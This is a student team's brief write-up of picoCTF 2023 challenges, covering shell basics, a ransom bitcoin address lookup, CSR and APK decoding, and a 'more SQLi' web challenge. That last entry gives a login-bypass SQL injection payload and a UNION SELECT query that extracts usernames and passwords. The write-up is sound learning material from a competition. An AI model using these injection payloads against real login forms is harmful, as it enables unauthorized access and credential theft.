picoCTF-2023-Writeup

Overview

We have participated in picoCTF 2023 competition, which is organised by Carnegie Mellon University and ran from Mar 15 2023 to Mar 29 2023.

The following is our write up of the challenges we solved during the contest.

Team

NCKU-LeafLeafLeaf (National Cheng Kung University)

General Skills

chrono

Use ssh to connect to the server.

in path / has a directory named challenge.

Use cd command to challenge and ls to check what is inside the directory.

Use cat command to open the JSON file, and we can get the flag.

money-ware

We can search 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX in browser.

As we can see, the flag is picoCTF{Petya}

Permissions

Use ssh to connect to the server.

in path / has a directory named challenge.

Use cd command to challenge and ls to check what is inside the directory.

Open the JSON file by vim and get the flag.

Crypto

ReadMyCert

CSR decoder :D https://www.sslshopper.com/csr-decoder.html

Reverse

timer

apk file decompile http://www.javadecompilers.com/processing

Web

more SQLi

username: admin
password: qwertyuiop
SQL query: SELECT id FROM users WHERE password = 'qwertyuiop' AND username = 'admin'

login payload : password = 'OR 1==1 -- 登入以後出現的畫面(the page after login):welcome.php input payload : ' UNION SELECT id,name,password FROM users -- and gets id : 1 name: admin password: moreRandOMN3ss

bacon-cy/picoCTF-2023-Writeup